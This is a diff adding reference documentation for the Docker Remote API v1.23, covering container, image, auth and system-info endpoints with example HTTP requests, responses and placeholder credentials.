6651904, + "usage" : 6537216, + "failcnt" : 0, + "limit" : 67108864 + }, + "blkio_stats" : {}, + "cpu_stats" : { + "cpu_usage" : { + "percpu_usage" : [ + 8646879, + 24472255, + 36438778, + 30657443 + ], + "usage_in_usermode" : 50000000, + "total_usage" : 100215355, + "usage_in_kernelmode" : 30000000 + }, + "system_cpu_usage" : 739306590000000, + "throttling_data" : {"periods":0,"throttled_periods":0,"throttled_time":0} + }, + "precpu_stats" : { + "cpu_usage" : { + "percpu_usage" : [ + 8646879, + 24350896, + 36438778, + 30657443 + ], + "usage_in_usermode" : 50000000, + "total_usage" : 100093996, + "usage_in_kernelmode" : 30000000 + }, + 
"system_cpu_usage" : 9492140000000, + "throttling_data" : {"periods":0,"throttled_periods":0,"throttled_time":0} + } + } + +The precpu_stats is the cpu statistic of last read, which is used for calculating the cpu usage percent. It is not the exact copy of the “cpu_stats” field. + +**Query parameters**: + +- **stream** – 1/True/true or 0/False/false, pull stats once then disconnect. Default `true`. + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Resize a container TTY + +`POST /containers/(id or name)/resize` + +Resize the TTY for container with `id`. The unit is number of characters. You must restart the container for the resize to take effect. + +**Example request**: + + POST /v1.23/containers/4fa6e0f0c678/resize?h=40&w=80 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Length: 0 + Content-Type: text/plain; charset=utf-8 + +**Query parameters**: + +- **h** – height of `tty` session +- **w** – width + +**Status codes**: + +- **200** – no error +- **404** – No such container +- **500** – Cannot resize container + +#### Start a container + +`POST /containers/(id or name)/start` + +Start the container `id` + +> **Note**: +> For backwards compatibility, this endpoint accepts a `HostConfig` as JSON-encoded request body. +> See [create a container](#create-a-container) for details. + +**Example request**: + + POST /v1.23/containers/e90e34656806/start HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **detachKeys** – Override the key sequence for detaching a + container. Format is a single character `[a-Z]` or `ctrl-` + where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`. 
+ +**Status codes**: + +- **204** – no error +- **304** – container already started +- **404** – no such container +- **500** – server error + +#### Stop a container + +`POST /containers/(id or name)/stop` + +Stop the container `id` + +**Example request**: + + POST /v1.23/containers/e90e34656806/stop?t=5 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **t** – number of seconds to wait before killing the container + +**Status codes**: + +- **204** – no error +- **304** – container already stopped +- **404** – no such container +- **500** – server error + +#### Restart a container + +`POST /containers/(id or name)/restart` + +Restart the container `id` + +**Example request**: + + POST /v1.23/containers/e90e34656806/restart?t=5 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **t** – number of seconds to wait before killing the container + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Kill a container + +`POST /containers/(id or name)/kill` + +Kill the container `id` + +**Example request**: + + POST /v1.23/containers/e90e34656806/kill HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **signal** - Signal to send to the container: integer or string like `SIGINT`. + When not set, `SIGKILL` is assumed and the call waits for the container to exit. + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Update a container + +`POST /containers/(id or name)/update` + +Update configuration of one or more containers. 
+ +**Example request**: + + POST /v1.23/containers/e90e34656806/update HTTP/1.1 + Content-Type: application/json + + { + "BlkioWeight": 300, + "CpuShares": 512, + "CpuPeriod": 100000, + "CpuQuota": 50000, + "CpusetCpus": "0,1", + "CpusetMems": "0", + "Memory": 314572800, + "MemorySwap": 514288000, + "MemoryReservation": 209715200, + "KernelMemory": 52428800, + "RestartPolicy": { + "MaximumRetryCount": 4, + "Name": "on-failure" + }, + } + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Warnings": [] + } + +**Status codes**: + +- **200** – no error +- **400** – bad parameter +- **404** – no such container +- **500** – server error + +#### Rename a container + +`POST /containers/(id or name)/rename` + +Rename the container `id` to a `new_name` + +**Example request**: + + POST /v1.23/containers/e90e34656806/rename?name=new_name HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **name** – new name for the container + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **409** - conflict name already assigned +- **500** – server error + +#### Pause a container + +`POST /containers/(id or name)/pause` + +Pause the container `id` + +**Example request**: + + POST /v1.23/containers/e90e34656806/pause HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Unpause a container + +`POST /containers/(id or name)/unpause` + +Unpause the container `id` + +**Example request**: + + POST /v1.23/containers/e90e34656806/unpause HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Attach to a container + +`POST /containers/(id or name)/attach` + +Attach to the container `id` + +**Example request**: + + POST 
/v1.23/containers/16253994b7c4/attach?logs=1&stream=0&stdout=1 HTTP/1.1 + +**Example response**: + + HTTP/1.1 101 UPGRADED + Content-Type: application/vnd.docker.raw-stream + Connection: Upgrade + Upgrade: tcp + + {% raw %} + {{ STREAM }} + {% endraw %} + +**Query parameters**: + +- **detachKeys** – Override the key sequence for detaching a + container. Format is a single character `[a-Z]` or `ctrl-` + where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`. +- **logs** – 1/True/true or 0/False/false, return logs. Default `false`. +- **stream** – 1/True/true or 0/False/false, return stream. + Default `false`. +- **stdin** – 1/True/true or 0/False/false, if `stream=true`, attach + to `stdin`. Default `false`. +- **stdout** – 1/True/true or 0/False/false, if `logs=true`, return + `stdout` log, if `stream=true`, attach to `stdout`. Default `false`. +- **stderr** – 1/True/true or 0/False/false, if `logs=true`, return + `stderr` log, if `stream=true`, attach to `stderr`. Default `false`. + +**Status codes**: + +- **101** – no error, hints proxy about hijacking +- **200** – no error, no upgrade header found +- **400** – bad parameter +- **404** – no such container +- **409** - container is paused +- **500** – server error + +**Stream details**: + +When using the TTY setting is enabled in +[`POST /containers/create` +](#create-a-container), +the stream is the raw data from the process PTY and client's `stdin`. +When the TTY is disabled, then the stream is multiplexed to separate +`stdout` and `stderr`. + +The format is a **Header** and a **Payload** (frame). + +**HEADER** + +The header contains the information which the stream writes (`stdout` or +`stderr`). It also contains the size of the associated frame encoded in the +last four bytes (`uint32`). 
+ +It is encoded on the first eight bytes like this: + + header := [8]byte{STREAM_TYPE, 0, 0, 0, SIZE1, SIZE2, SIZE3, SIZE4} + +`STREAM_TYPE` can be: + +- 0: `stdin` (is written on `stdout`) +- 1: `stdout` +- 2: `stderr` + +`SIZE1, SIZE2, SIZE3, SIZE4` are the four bytes of +the `uint32` size encoded as big endian. + +**PAYLOAD** + +The payload is the raw stream. + +**IMPLEMENTATION** + +The simplest way to implement the Attach protocol is the following: + + 1. Read eight bytes. + 2. Choose `stdout` or `stderr` depending on the first byte. + 3. Extract the frame size from the last four bytes. + 4. Read the extracted size and output it on the correct output. + 5. Goto 1. + +#### Attach to a container (websocket) + +`GET /containers/(id or name)/attach/ws` + +Attach to the container `id` via websocket + +Implements websocket protocol handshake according to [RFC 6455](http://tools.ietf.org/html/rfc6455) + +**Example request** + + GET /v1.23/containers/e90e34656806/attach/ws?logs=0&stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1 + +**Example response** + + {% raw %} + {{ STREAM }} + {% endraw %} + +**Query parameters**: + +- **detachKeys** – Override the key sequence for detaching a + container. Format is a single character `[a-Z]` or `ctrl-` + where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`. +- **logs** – 1/True/true or 0/False/false, return logs. Default `false`. +- **stream** – 1/True/true or 0/False/false, return stream. + Default `false`. +- **stdin** – 1/True/true or 0/False/false, if `stream=true`, attach + to `stdin`. Default `false`. +- **stdout** – 1/True/true or 0/False/false, if `logs=true`, return + `stdout` log, if `stream=true`, attach to `stdout`. Default `false`. +- **stderr** – 1/True/true or 0/False/false, if `logs=true`, return + `stderr` log, if `stream=true`, attach to `stderr`. Default `false`. 
+ +**Status codes**: + +- **200** – no error +- **400** – bad parameter +- **404** – no such container +- **500** – server error + +#### Wait a container + +`POST /containers/(id or name)/wait` + +Block until container `id` stops, then returns the exit code + +**Example request**: + + POST /v1.23/containers/16253994b7c4/wait HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"StatusCode": 0} + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Remove a container + +`DELETE /containers/(id or name)` + +Remove the container `id` from the filesystem + +**Example request**: + + DELETE /v1.23/containers/16253994b7c4?v=1 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **v** – 1/True/true or 0/False/false, Remove the volumes + associated to the container. Default `false`. +- **force** - 1/True/true or 0/False/false, Kill then remove the container. + Default `false`. + +**Status codes**: + +- **204** – no error +- **400** – bad parameter +- **404** – no such container +- **409** – conflict +- **500** – server error + +#### Copy files or folders from a container + +`POST /containers/(id or name)/copy` + +Copy files or folders of container `id` + +**Deprecated** in favor of the `archive` endpoint below. + +**Example request**: + + POST /v1.23/containers/4fa6e0f0c678/copy HTTP/1.1 + Content-Type: application/json + + { + "Resource": "test.txt" + } + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Retrieving information about files and folders in a container + +`HEAD /containers/(id or name)/archive` + +See the description of the `X-Docker-Container-Path-Stat` header in the +following section. 
+ +#### Get an archive of a filesystem resource in a container + +`GET /containers/(id or name)/archive` + +Get a tar archive of a resource in the filesystem of container `id`. + +**Query parameters**: + +- **path** - resource in the container's filesystem to archive. Required. + + If not an absolute path, it is relative to the container's root directory. + The resource specified by **path** must exist. To assert that the resource + is expected to be a directory, **path** should end in `/` or `/.` + (assuming a path separator of `/`). If **path** ends in `/.` then this + indicates that only the contents of the **path** directory should be + copied. A symlink is always resolved to its target. + + > **Note**: It is not possible to copy certain system files such as resources + > under `/proc`, `/sys`, `/dev`, and mounts created by the user in the + > container. + +**Example request**: + + GET /v1.23/containers/8cce319429b2/archive?path=/root HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + X-Docker-Container-Path-Stat: eyJuYW1lIjoicm9vdCIsInNpemUiOjQwOTYsIm1vZGUiOjIxNDc0ODQwOTYsIm10aW1lIjoiMjAxNC0wMi0yN1QyMDo1MToyM1oiLCJsaW5rVGFyZ2V0IjoiIn0= + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +On success, a response header `X-Docker-Container-Path-Stat` will be set to a +base64-encoded JSON object containing some filesystem header information about +the archived resource. The above example value would decode to the following +JSON object (whitespace added for readability): + +```json +{ + "name": "root", + "size": 4096, + "mode": 2147484096, + "mtime": "2014-02-27T20:51:23Z", + "linkTarget": "" +} +``` + +A `HEAD` request can also be made to this endpoint if only this information is +desired. 
+
+**Status codes**:
+
+- **200** - success, returns archive of copied resource
+- **400** - client error, bad parameter, details in JSON response body, one of:
+    - must specify path parameter (**path** cannot be empty)
+    - not a directory (**path** was asserted to be a directory but exists as a
+      file)
+- **404** - client error, resource not found, one of:
+    - no such container (container `id` does not exist)
+    - no such file or directory (**path** does not exist)
+- **500** - server error
+
+#### Extract an archive of files or folders to a directory in a container
+
+`PUT /containers/(id or name)/archive`
+
+Upload a tar archive to be extracted to a path in the filesystem of container
+`id`.
+
+**Query parameters**:
+
+- **path** - path to a directory in the container
+    to extract the archive's contents into. Required.
+
+    If not an absolute path, it is relative to the container's root directory.
+    The **path** resource must exist.
+- **noOverwriteDirNonDir** - If "1", "true", or "True" then it will be an error
+    if unpacking the given content would cause an existing directory to be
+    replaced with a non-directory and vice versa.
+
+**Example request**:
+
+    PUT /v1.23/containers/8cce319429b2/archive?path=/vol1 HTTP/1.1
+    Content-Type: application/x-tar
+
+    {% raw %}
+    {{ TAR STREAM }}
+    {% endraw %}
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+
+**Status codes**:
+
+- **200** – the content was extracted successfully
+- **400** - client error, bad parameter, details in JSON response body, one of:
+    - must specify path parameter (**path** cannot be empty)
+    - not a directory (**path** should be a directory but exists as a file)
+    - unable to overwrite existing directory with non-directory
+      (if **noOverwriteDirNonDir**)
+    - unable to overwrite existing non-directory with directory
+      (if **noOverwriteDirNonDir**)
+- **403** - client error, permission denied, the volume
+    or container rootfs is marked as read-only.
+- **404** - client error, resource not found, one of: + – no such container (container `id` does not exist) + - no such file or directory (**path** resource does not exist) +- **500** – server error + +### 2.2 Images + +#### List Images + +`GET /images/json` + +**Example request**: + + GET /v1.23/images/json?all=0 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "RepoTags": [ + "ubuntu:12.04", + "ubuntu:precise", + "ubuntu:latest" + ], + "Id": "8dbd9e392a964056420e5d58ca5cc376ef18e2de93b5cc90e868a1bbc8318c1c", + "Created": 1365714795, + "Size": 131506275, + "VirtualSize": 131506275, + "Labels": {} + }, + { + "RepoTags": [ + "ubuntu:12.10", + "ubuntu:quantal" + ], + "ParentId": "27cf784147099545", + "Id": "b750fe79269d2ec9a3c593ef05b4332b1d1a02a62b4accb2c21d589ff2f5f2dc", + "Created": 1364102658, + "Size": 24653, + "VirtualSize": 180116135, + "Labels": { + "com.example.version": "v1" + } + } + ] + +**Example request, with digest information**: + + GET /v1.23/images/json?digests=1 HTTP/1.1 + +**Example response, with digest information**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Created": 1420064636, + "Id": "4986bf8c15363d1c5d15512d5266f8777bfba4974ac56e3270e7760f6f0a8125", + "ParentId": "ea13149945cb6b1e746bf28032f02e9b5a793523481a0a18645fc77ad53c4ea2", + "RepoDigests": [ + "localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf" + ], + "RepoTags": [ + "localhost:5000/test/busybox:latest", + "playdate:latest" + ], + "Size": 0, + "VirtualSize": 2429728, + "Labels": {} + } + ] + +The response shows a single image `Id` associated with two repositories +(`RepoTags`): `localhost:5000/test/busybox`: and `playdate`. A caller can use +either of the `RepoTags` values `localhost:5000/test/busybox:latest` or +`playdate:latest` to reference the image. + +You can also use `RepoDigests` values to reference an image. 
In this response, +the array has only one reference and that is to the +`localhost:5000/test/busybox` repository; the `playdate` repository has no +digest. You can reference this digest using the value: +`localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d...` + +See the `docker run` and `docker build` commands for examples of digest and tag +references on the command line. + +**Query parameters**: + +- **all** – 1/True/true or 0/False/false, default false +- **filters** – a JSON encoded value of the filters (a map[string][]string) to process on the images list. Available filters: + - `dangling=true` + - `label=key` or `label="key=value"` of an image label +- **filter** - only return images with the specified name + +#### Build image from a Dockerfile + +`POST /build` + +Build an image from a Dockerfile + +**Example request**: + + POST /v1.23/build HTTP/1.1 + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"stream": "Step 1/5..."} + {"stream": "..."} + {"error": "Error...", "errorDetail": {"code": 123, "message": "Error..."}} + +The input stream must be a `tar` archive compressed with one of the +following algorithms: `identity` (no compression), `gzip`, `bzip2`, `xz`. + +The archive must include a build instructions file, typically called +`Dockerfile` at the archive's root. The `dockerfile` parameter may be +used to specify a different build instructions file. To do this, its value must be +the path to the alternate build instructions file to use. + +The archive may include any number of other files, +which are accessible in the build context (See the [*ADD build +command*](../reference/builder.md#add)). + +The Docker daemon performs a preliminary validation of the `Dockerfile` before +starting the build, and returns an error if the syntax is incorrect. After that, +each instruction is run one-by-one until the ID of the new image is output. 
+ +The build is canceled if the client drops the connection by quitting +or being killed. + +**Query parameters**: + +- **dockerfile** - Path within the build context to the `Dockerfile`. This is + ignored if `remote` is specified and points to an external `Dockerfile`. +- **t** – A name and optional tag to apply to the image in the `name:tag` format. + If you omit the `tag` the default `latest` value is assumed. + You can provide one or more `t` parameters. +- **remote** – A Git repository URI or HTTP/HTTPS context URI. If the + URI points to a single text file, the file's contents are placed into + a file called `Dockerfile` and the image is built from that file. If + the URI points to a tarball, the file is downloaded by the daemon and + the contents therein used as the context for the build. If the URI + points to a tarball and the `dockerfile` parameter is also specified, + there must be a file with the corresponding path inside the tarball. +- **q** – Suppress verbose build output. +- **nocache** – Do not use the cache when building the image. +- **pull** - Attempt to pull the image even if an older image exists locally. +- **rm** - Remove intermediate containers after a successful build (default behavior). +- **forcerm** - Always remove intermediate containers (includes `rm`). +- **memory** - Set memory limit for build. +- **memswap** - Total memory (memory + swap), `-1` to enable unlimited swap. +- **cpushares** - CPU shares (relative weight). +- **cpusetcpus** - CPUs in which to allow execution (e.g., `0-3`, `0,1`). +- **cpuperiod** - The length of a CPU period in microseconds. +- **cpuquota** - Microseconds of CPU time that the container can get in a CPU period. +- **buildargs** – JSON map of string pairs for build-time variables. Users pass + these values at build-time. Docker uses the `buildargs` as the environment + context for command(s) run via the Dockerfile's `RUN` instruction or for + variable expansion in other Dockerfile instructions. 
This is not meant for + passing secret values. [Read more about the buildargs instruction](../reference/builder.md#arg) +- **shmsize** - Size of `/dev/shm` in bytes. The size must be greater than 0. If omitted the system uses 64MB. +- **labels** – JSON map of string pairs for labels to set on the image. + +**Request Headers**: + +- **Content-type** – Set to `"application/tar"`. +- **X-Registry-Config** – A base64-url-safe-encoded Registry Auth Config JSON + object with the following structure: + + { + "docker.example.com": { + "username": "janedoe", + "password": "hunter2" + }, + "https://index.docker.io/v1/": { + "username": "mobydock", + "password": "conta1n3rize14" + } + } + + This object maps the hostname of a registry to an object containing the + "username" and "password" for that registry. Multiple registries may + be specified as the build may be based on an image requiring + authentication to pull from any arbitrary registry. Only the registry + domain name (and port if not the default "443") are required. However + (for legacy reasons) the "official" Docker, Inc. hosted registry must + be specified with both a "https://" prefix and a "/v1/" suffix even + though Docker will prefer to use the v2 registry API. + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Create an image + +`POST /images/create` + +Create an image either by pulling it from the registry or by importing it + +**Example request**: + + POST /v1.23/images/create?fromImage=busybox&tag=latest HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"status": "Pulling..."} + {"status": "Pulling", "progress": "1 B/ 100 B", "progressDetail": {"current": 1, "total": 100}} + {"error": "Invalid..."} + ... + +When using this endpoint to pull an image from the registry, the +`X-Registry-Auth` header can be used to include +a base64-encoded AuthConfig object. + +**Query parameters**: + +- **fromImage** – Name of the image to pull. 
The name may include a tag or + digest. This parameter may only be used when pulling an image. + The pull is cancelled if the HTTP connection is closed. +- **fromSrc** – Source to import. The value may be a URL from which the image + can be retrieved or `-` to read the image from the request body. + This parameter may only be used when importing an image. +- **repo** – Repository name given to an image when it is imported. + The repo may include a tag. This parameter may only be used when importing + an image. +- **tag** – Tag or digest. If empty when pulling an image, this causes all tags + for the given image to be pulled. + +**Request Headers**: + +- **X-Registry-Auth** – base64-encoded AuthConfig object, containing either login information, or a token + - Credential based login: + + ``` + { + "username": "jdoe", + "password": "secret", + "email": "jdoe@acme.com" + } + ``` + + - Token based login: + + ``` + { + "identitytoken": "9cbaf023786cd7..." + } + ``` + +**Status codes**: + +- **200** – no error +- **404** - repository does not exist or no read access +- **500** – server error + + + +#### Inspect an image + +`GET /images/(name)/json` + +Return low-level information on the image `name` + +**Example request**: + + GET /v1.23/images/example/json HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Id" : "sha256:85f05633ddc1c50679be2b16a0479ab6f7637f8884e0cfe0f4d20e1ebb3d6e7c", + "Container" : "cb91e48a60d01f1e27028b4fc6819f4f290b3cf12496c8176ec714d0d390984a", + "Comment" : "", + "Os" : "linux", + "Architecture" : "amd64", + "Parent" : "sha256:91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c", + "ContainerConfig" : { + "Tty" : false, + "Hostname" : "e611e15f9c9d", + "Volumes" : null, + "Domainname" : "", + "AttachStdout" : false, + "PublishService" : "", + "AttachStdin" : false, + "OpenStdin" : false, + "StdinOnce" : false, + "NetworkDisabled" : false, + "OnBuild" : [], + "Image" : 
"91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c", + "User" : "", + "WorkingDir" : "", + "Entrypoint" : null, + "MacAddress" : "", + "AttachStderr" : false, + "Labels" : { + "com.example.license" : "GPL", + "com.example.version" : "1.0", + "com.example.vendor" : "Acme" + }, + "Env" : [ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + ], + "ExposedPorts" : null, + "Cmd" : [ + "/bin/sh", + "-c", + "#(nop) LABEL com.example.vendor=Acme com.example.license=GPL com.example.version=1.0" + ] + }, + "DockerVersion" : "1.9.0-dev", + "VirtualSize" : 188359297, + "Size" : 0, + "Author" : "", + "Created" : "2015-09-10T08:30:53.26995814Z", + "GraphDriver" : { + "Name" : "aufs", + "Data" : null + }, + "RepoDigests" : [ + "localhost:5000/test/busybox/example@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf" + ], + "RepoTags" : [ + "example:1.0", + "example:latest", + "example:stable" + ], + "Config" : { + "Image" : "91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c", + "NetworkDisabled" : false, + "OnBuild" : [], + "StdinOnce" : false, + "PublishService" : "", + "AttachStdin" : false, + "OpenStdin" : false, + "Domainname" : "", + "AttachStdout" : false, + "Tty" : false, + "Hostname" : "e611e15f9c9d", + "Volumes" : null, + "Cmd" : [ + "/bin/bash" + ], + "ExposedPorts" : null, + "Env" : [ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + ], + "Labels" : { + "com.example.vendor" : "Acme", + "com.example.version" : "1.0", + "com.example.license" : "GPL" + }, + "Entrypoint" : null, + "MacAddress" : "", + "AttachStderr" : false, + "WorkingDir" : "", + "User" : "" + }, + "RootFS": { + "Type": "layers", + "Layers": [ + "sha256:1834950e52ce4d5a88a1bbd131c537f4d0e56d10ff0dd69e66be3b7dfa9df7e6", + "sha256:5f70bf18a086007016e948b04aed3b82103a36bea41755b6cddfaf10ace3c6ef" + ] + } + } + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **500** – server error + +#### Get 
the history of an image + +`GET /images/(name)/history` + +Return the history of the image `name` + +**Example request**: + + GET /v1.23/images/ubuntu/history HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Id": "3db9c44f45209632d6050b35958829c3a2aa256d81b9a7be45b362ff85c54710", + "Created": 1398108230, + "CreatedBy": "/bin/sh -c #(nop) ADD file:eb15dbd63394e063b805a3c32ca7bf0266ef64676d5a6fab4801f2e81e2a5148 in /", + "Tags": [ + "ubuntu:lucid", + "ubuntu:10.04" + ], + "Size": 182964289, + "Comment": "" + }, + { + "Id": "6cfa4d1f33fb861d4d114f43b25abd0ac737509268065cdfd69d544a59c85ab8", + "Created": 1398108222, + "CreatedBy": "/bin/sh -c #(nop) MAINTAINER Tianon Gravi - mkimage-debootstrap.sh -i iproute,iputils-ping,ubuntu-minimal -t lucid.tar.xz lucid http://archive.ubuntu.com/ubuntu/", + "Tags": null, + "Size": 0, + "Comment": "" + }, + { + "Id": "511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158", + "Created": 1371157430, + "CreatedBy": "", + "Tags": [ + "scratch12:latest", + "scratch:latest" + ], + "Size": 0, + "Comment": "Imported from -" + } + ] + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **500** – server error + +#### Push an image on the registry + +`POST /images/(name)/push` + +Push the image `name` on the registry + +**Example request**: + + POST /v1.23/images/test/push HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"status": "Pushing..."} + {"status": "Pushing", "progress": "1/? (n/a)", "progressDetail": {"current": 1}}} + {"error": "Invalid..."} + ... + +If you wish to push an image on to a private registry, that image must already have a tag +into a repository which references that registry `hostname` and `port`. This repository name should +then be used in the URL. This duplicates the command line's flow. + +The push is cancelled if the HTTP connection is closed. 
+
+**Example request**:
+
+    POST /v1.23/images/registry.acme.com:5000/test/push HTTP/1.1
+
+
+**Query parameters**:
+
+- **tag** – The tag to associate with the image on the registry. This is optional.
+
+**Request Headers**:
+
+- **X-Registry-Auth** – base64-encoded AuthConfig object, containing either login information, or a token
+    - Credential based login:
+
+        ```
+        {
+            "username": "jdoe",
+            "password": "secret",
+            "email": "jdoe@acme.com"
+        }
+        ```
+
+    - Identity token based login:
+
+        ```
+        {
+            "identitytoken": "9cbaf023786cd7..."
+        }
+        ```
+
+**Status codes**:
+
+- **200** – no error
+- **404** – no such image
+- **500** – server error
+
+#### Tag an image into a repository
+
+`POST /images/(name)/tag`
+
+Tag the image `name` into a repository
+
+**Example request**:
+
+    POST /v1.23/images/test/tag?repo=myrepo&force=0&tag=v42 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 201 Created
+
+**Query parameters**:
+
+- **repo** – The repository to tag in
+- **force** – 1/True/true or 0/False/false, default false
+- **tag** - The new tag name
+
+**Status codes**:
+
+- **201** – no error
+- **400** – bad parameter
+- **404** – no such image
+- **409** – conflict
+- **500** – server error
+
+#### Remove an image
+
+`DELETE /images/(name)`
+
+Remove the image `name` from the filesystem
+
+**Example request**:
+
+    DELETE /v1.23/images/test HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-type: application/json
+
+    [
+     {"Untagged": "3e2f21a89f"},
+     {"Deleted": "3e2f21a89f"},
+     {"Deleted": "53b4f83ac9"}
+    ]
+
+**Query parameters**:
+
+- **force** – 1/True/true or 0/False/false, default false
+- **noprune** – 1/True/true or 0/False/false, default false
+
+**Status codes**:
+
+- **200** – no error
+- **404** – no such image
+- **409** – conflict
+- **500** – server error
+
+#### Search images
+
+`GET /images/search`
+
+Search for an image on [Docker Hub](https://hub.docker.com).
+ +> **Note**: +> The response keys have changed from API v1.6 to reflect the JSON +> sent by the registry server to the docker daemon's request. + +**Example request**: + + GET /v1.23/images/search?term=sshd HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "description": "", + "is_official": false, + "is_automated": false, + "name": "wma55/u1210sshd", + "star_count": 0 + }, + { + "description": "", + "is_official": false, + "is_automated": false, + "name": "jdswinbank/sshd", + "star_count": 0 + }, + { + "description": "", + "is_official": false, + "is_automated": false, + "name": "vgauthier/sshd", + "star_count": 0 + } + ... + ] + +**Query parameters**: + +- **term** – term to search + +**Status codes**: + +- **200** – no error +- **500** – server error + +### 2.3 Misc + +#### Check auth configuration + +`POST /auth` + +Validate credentials for a registry and get identity token, +if available, for accessing the registry without password. + +**Example request**: + + POST /v1.23/auth HTTP/1.1 + Content-Type: application/json + + { + "username": "hannibal", + "password": "xxxx", + "serveraddress": "https://index.docker.io/v1/" + } + +**Example response**: + + HTTP/1.1 200 OK + + { + "Status": "Login Succeeded", + "IdentityToken": "9cbaf023786cd7..." 
+ } + +**Status codes**: + +- **200** – no error +- **204** – no error +- **500** – server error + +#### Display system-wide information + +`GET /info` + +Display system-wide information + +**Example request**: + + GET /v1.23/info HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Architecture": "x86_64", + "ClusterStore": "etcd://localhost:2379", + "CgroupDriver": "cgroupfs", + "Containers": 11, + "ContainersRunning": 7, + "ContainersStopped": 3, + "ContainersPaused": 1, + "CpuCfsPeriod": true, + "CpuCfsQuota": true, + "Debug": false, + "DockerRootDir": "/var/lib/docker", + "Driver": "btrfs", + "DriverStatus": [[""]], + "ExecutionDriver": "native-0.1", + "ExperimentalBuild": false, + "HttpProxy": "http://test:test@localhost:8080", + "HttpsProxy": "https://test:test@localhost:8080", + "ID": "7TRN:IPZB:QYBB:VPBQ:UMPP:KARE:6ZNR:XE6T:7EWV:PKF4:ZOJD:TPYS", + "IPv4Forwarding": true, + "Images": 16, + "IndexServerAddress": "https://index.docker.io/v1/", + "InitPath": "/usr/bin/docker", + "InitSha1": "", + "KernelMemory": true, + "KernelVersion": "3.12.0-1-amd64", + "Labels": [ + "storage=ssd" + ], + "MemTotal": 2099236864, + "MemoryLimit": true, + "NCPU": 1, + "NEventsListener": 0, + "NFd": 11, + "NGoroutines": 21, + "Name": "prod-server-42", + "NoProxy": "9.81.1.160", + "OomKillDisable": true, + "OSType": "linux", + "OperatingSystem": "Boot2Docker", + "Plugins": { + "Volume": [ + "local" + ], + "Network": [ + "null", + "host", + "bridge" + ] + }, + "RegistryConfig": { + "IndexConfigs": { + "docker.io": { + "Mirrors": null, + "Name": "docker.io", + "Official": true, + "Secure": true + } + }, + "InsecureRegistryCIDRs": [ + "127.0.0.0/8" + ] + }, + "ServerVersion": "1.9.0", + "SwapLimit": false, + "SystemStatus": [["State", "Healthy"]], + "SystemTime": "2015-03-10T11:11:23.730591467-07:00" + } + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Show the docker version information + +`GET /version` + 
